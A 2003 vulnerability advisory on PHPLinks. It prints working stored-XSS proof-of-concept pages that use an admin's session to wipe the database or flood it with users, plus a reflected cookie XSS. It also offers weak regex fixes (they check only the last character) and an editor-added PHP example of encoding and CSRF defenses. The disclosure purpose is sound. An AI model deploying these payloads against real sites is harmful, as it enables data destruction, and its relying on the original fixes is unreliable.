21st Jan 2003 [SBWID-5941]
COMMAND
	PHPLinks multiple vulnerabilities
SYSTEMS AFFECTED
	latest ? (as of 21 January 2003)
PROBLEM
	JeiAr from CyberArmy Security Research ACAT Team
	[http://www.gulftech.org], [http://www.security-research.org] says:
	There lies a fault in the include/add.php script that allows a remote
	attacker to inject code into the script and have it run as an admin.
	The vulnerability comes from improper input validation and improper
	session authentication. Below is some example code that I have written.
	Put this in one of the fields on the "Add Site" form located at
	
	 http://blah/phplinks/index.php?show=add&PID= 
	
	If you inject the code into the Site Title or Site URL field, the code
	will be run as soon as a logged in administrator views it.
	
	 <iframe src=http://blah/death.html></iframe>
	
	Below is the code for the called file "death.html"
	
	---------------------------------------------------------------------------
	<script language=JavaScript>
	var i = 10; // This is the number of the user ID to start deleting
	var BaseURL = "http://victimsite/phplinks/";
	// this resets the database
	window.open(BaseURL + '/admin/reset.php?reset_in=&reset_out=&search_terms=&referrers=&submit=');
	function Waste()
	{
	    while (i) {
	        i++;
	        window.open(BaseURL + 'admin/delete_site.php?dbtable=links&ID=' + i + '&sure=Yes');
	    }
	}
	</script>
	<body onLoad="Waste();">
	---------------------------------------------------------------------------
	
	As you can see, when that code is run (called by a logged in admin
	validating sites), the database is in a lot of cases going to be left
	empty. By the way, the dbtable=links can be changed to dbtable=temp in
	order to affect sites not yet approved etc. On the other hand you can
	add users to the database and more. Take the following code for example:
	
	 <iframe src=http://blah/life.html></iframe>
	
	Below is the code for the called file "life.html"
	
	---------------------------------------------------------------------------
	<script language=JavaScript>
	var i = 1;
	var BaseURL = "http://victimsite/phplinks/";
	function Gluttony()
	{
	    while (i) {
	        i++;
	        window.open(BaseURL + '/admin/add_site.php?SiteName=JeiAr0wnethTheee' + i
	            + '&SiteURL=http://www.b' + i + 'j.orfd&Description=' + i
	            + '3333333333333333333333333333333333&Category=&Country=Turkey.gif&Email=1@t.' + i
	            + '&UserName=12345' + i
	            + '&Password=12345678&Hint=12345678910&add=' + i + '&sure=Yes');
	    }
	}
	</script>
	<body onLoad="Gluttony();">
	---------------------------------------------------------------------------
	
	Once again, when a logged in admin goes to validate sites (unless they
	have a popup killer, JS disabled, etc.) they are gonna be adding MANY
	users to the database before they really realize what's happening. This
	also jolts the server quite a bit by hogging up resources. You can
	basically change almost anything that the admin can by just injecting
	code. Also, note that these proof of concept scripts could be altered
	to supply large numbers of malformed site submissions, and instead make
	it something worse like popunder windows etc. But I do not feel it
	would be very good to release a script like that publicly :) Also note
	that for whatever reason the most updated Norton AV does not pick this
	script up as a window bomb. Maybe it's cause my JavaScript is so
	bastardized it doesn't recognize the code at all. heheh j/k I put
	together a quick fix. I am no php guru, so if there is a better way
	then please correct me :)
	In the includes/add.php file find the following:
	
	// Handle form submission
	if(isset($submit_add)){
	
	And right below it paste the following code:
	
	//////////////////////////////////////////////////////////////////////////
	// PHPLinks Critical XSS Vulnerability Fix - By JeiAr - [email protected] //
	//////////////////////////////////////////////////////////////////////////
	$ip = $REMOTE_ADDR;
	$info = $HTTP_USER_AGENT;
	if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $SiteName)) {$err.= "Please enter A valid Site Name.<BR>";}
	if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $SiteURL)) {$err.= "Please enter A valid Site URL.<BR>";}
	if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $Description)) {$err.= "Enter A valid Description.<BR>";}
	if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $Category)) {$err.= "Enter A valid Category.<BR>";}
	if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $Country)) {$err.= "Enter A valid Country.<BR>";}
	if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $UserName)) {$err.= "Enter A valid UserName.<BR>";}
	if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $PW)) {$err.= "Please enter A valid Password.<BR>";}
	if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $PW2)) {$err.= "Please enter A valid Password.<BR>";}
	if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $Hint)) {$err.= "Please enter A valid Hint.<BR>";}
	if ($err) {
	    echo $err;
	    echo "<b>Possible Hack Attempt!!</b><br>";
	    echo "<b>$ip</b><br>";
	    echo "<b>$info</b><br>";
	    echo "<a href=index.php?show=add>Back</a>";
	    exit;
	}
	/////////////////////////////////////////////////////////////////////////
	
	There is also a much less serious, but similar issue with the search
	feature. You can basically execute just about any JavaScript or HTML
	code and maybe more? Here is an example:
	
	 http://www.blah.org/index.php?term=<script>alert(document.cookie)</script>
	
	And if you write a script to send many automated malformed search
	strings, the code will show up with the most searched for terms on the
	main search page, thus running any code you supply in the site's
	visitors' browsers. Below is a quick fix for that, I basically just ereg
	the input for invalid metacharacters.
	In includes/results.php find the following:
	
	if(isset($term) && strlen($term)>0){
	
	Below it place the following:
	
	/////////////////////////////////////////////////////////////////////////
	// PHPLinks XSS Vulnerability Fix - By JeiAr - [email protected] 01-2003 //
	/////////////////////////////////////////////////////////////////////////
	$ip = $REMOTE_ADDR;
	$info = $HTTP_USER_AGENT;
	if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $term)) {$err.= "Please enter A valid Search Term.<BR>";}
	if ($err) {
	    echo $err;
	    echo "<b>Possible Hack Attempt!!</b><br>";
	    echo "<b>$ip</b><br>";
	    echo "<b>$info</b><br>";
	    echo "<a href=index.php>Back</a>";
	    exit;
	}
	////////////////////////////////////////////////////////////////////////
	
	One bad thing about the most searched for keywords feature is that
	anyone can put their web page, name, or something obscene as a search
	term. After clicking submit xxx number of times, they now have whatever
	they want on your main search page. Not really a security issue, but
	could be annoying. Don't ya think? And if someone used some CSS they
	could basically deface the site in a really lame kinda way ..
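	Editor's added example (not code from the advisory or from PHPLinks): the PHP below shows the two controls that address both the Add Site issue and the search-term issue described above, encoding stored values at render time and refusing admin actions that arrive as plain GET requests without a per-session token. The advisory's ereg() checks are anchored with $ and so inspect only the final character of each value, which is why output encoding, not input rejection, is the primary control here; the function names, the session key and the table allowlist are assumptions.

```php
<?php
// Added example, not code from the advisory or from PHPLinks. Function names,
// the session key and the table allowlist are hypothetical.

// 1. Encode on output. The stored Site Title, Site URL or search term may
//    contain anything; what matters is that the admin's and the visitors'
//    browsers receive it as text, not markup. ENT_QUOTES also covers values
//    echoed inside attributes.
function render_field(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// 2. The admin actions in the advisory are plain GET requests (reset.php,
//    delete_site.php and add_site.php with sure=Yes), so any page the admin
//    views can trigger them. Require POST plus a secret bound to the session.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function admin_action_allowed(string $method, array $post, array $session): bool
{
    return $method === 'POST'
        && isset($post['csrf_token'], $session['csrf_token'])
        && hash_equals($session['csrf_token'], (string) $post['csrf_token']);
}

// 3. dbtable= is taken straight from the request; accept only known tables.
function table_allowed(string $dbtable): bool
{
    return in_array($dbtable, ['links', 'temp'], true);
}

// Demonstration on constructed input: the advisory's own iframe payload and
// a forged cross-site GET versus a legitimate form post carrying the token.
$session = [];
$token   = csrf_token($session);
$payload = '<iframe src=http://blah/death.html></iframe>';

echo render_field($payload), "\n";
var_dump(admin_action_allowed('GET', [], $session));
var_dump(admin_action_allowed('POST', ['csrf_token' => $token], $session));
var_dump(table_allowed('users'));
```

	In the real include files the session array is $_SESSION after session_start(), and the admin forms must embed the token as a hidden field.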
SOLUTION
	?